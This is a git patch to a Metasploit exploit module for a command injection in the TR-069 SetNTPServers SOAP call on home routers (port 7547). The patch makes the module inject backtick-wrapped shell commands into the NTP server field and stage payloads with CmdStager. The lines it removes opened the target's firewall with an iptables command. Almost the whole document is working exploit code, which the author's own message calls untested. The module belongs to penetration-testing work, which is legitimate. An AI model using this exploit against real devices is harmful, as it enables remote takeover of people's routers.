From 4d6b2dfb460a6025174620b099903e98544f98c3 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 29 Nov 2016 15:03:38 -0600
Subject: [PATCH] Use CmdStager instead

Oh, and this is totally untested as of this commit.
---
 .../linux/http/tr069_ntpserver_cmdinject.rb   | 81 ++++++++++---------
 1 file changed, 43 insertions(+), 38 deletions(-)

diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
index a61f5d6272..821ea6f723 100644
--- a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@@ -4,6 +4,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -20,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'      =>
         [
           'Kenzo', # Vulnerability discovery and original Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Copypasta from TheMoon msf module
           'todb',  # Metasploit module
           'wvu' ,  # Metasploit module
           '0x27'   # Metasploit module
@@ -54,34 +56,59 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7547), # CWMP port
+        Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
       ], self.class)
 
-  @data_cmd_template = "<?xml version=\"1.0\"?>"
-  @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
-  @data_cmd_template << " <SOAP-ENV:Body>"
-  @data_cmd_template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
-  @data_cmd_template << "   <NewNTPServer1>%s</NewNTPServer1>"
-  @data_cmd_template << "   <NewNTPServer2></NewNTPServer2>"
-  @data_cmd_template << "   <NewNTPServer3></NewNTPServer3>"
-  @data_cmd_template << "   <NewNTPServer4></NewNTPServer4>"
-  @data_cmd_template << "   <NewNTPServer5></NewNTPServer5>"
-  @data_cmd_template << "  </u:SetNTPServers>"
-  @data_cmd_template << " </SOAP-ENV:Body>"
-  @data_cmd_template << "</SOAP-ENV:Envelope>"
+  end
+
+  def set_new_ntp_server(cmd)
+    template = "<?xml version=\"1.0\"?>"
+    template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    template << " <SOAP-ENV:Body>"
+    template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
+    template << "   <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
+    template << "   <NewNTPServer2></NewNTPServer2>"
+    template << "   <NewNTPServer3></NewNTPServer3>"
+    template << "   <NewNTPServer4></NewNTPServer4>"
+    template << "   <NewNTPServer5></NewNTPServer5>"
+    template << "  </u:SetNTPServers>"
+    template << " </SOAP-ENV:Body>"
+    template << "</SOAP-ENV:Envelope>"
+
+    template % cmd
+  end
+
+  def execute_command(cmd, opts)
+    uri = '/UD/act?1'
+    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
+    injected_data = set_new_ntp_server(cmd)
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'ctype' => "text/xml",
+        'method' => 'POST',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+        'data' => injected_data
+      }, 2)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
   end
 
   def check
     begin
       res = send_request_cgi({
-        'uri' => '/globe'
+        'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
       })
     rescue ::Rex::ConnectionError
       vprint_error("A connection error has occured")
       return Exploit::CheckCode::Unknown
     end
 
-    if res and res.code == 404 and res.body =~ /home_wan.htm/
+    if res and res.code == 404 and res.body =~ /home_wan\.htm/
       return Exploit::CheckCode::Appears
     end
 
@@ -96,29 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Exploiting...")
-    print_status("Dropping firewall on port 80...")
-    execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
-    execute_command("tick.eircom.net","")
-  end
-
-  def execute_command(cmd, opts)
-    uri = '/UD/act?1'
-    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
-    data_cmd = @data_cmd_template % "#{cmd}"
-    begin
-      res = send_request_cgi({
-        'uri'    => uri,
-        'ctype' => "text/xml",
-        'method' => 'POST',
-        'headers' => {
-          'SOAPAction' => soapaction,
-          },
-        'data' => data_cmd
-      })
-      return res
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
+    execute_cmdstager({:flavor => :echo})
   end
 
 end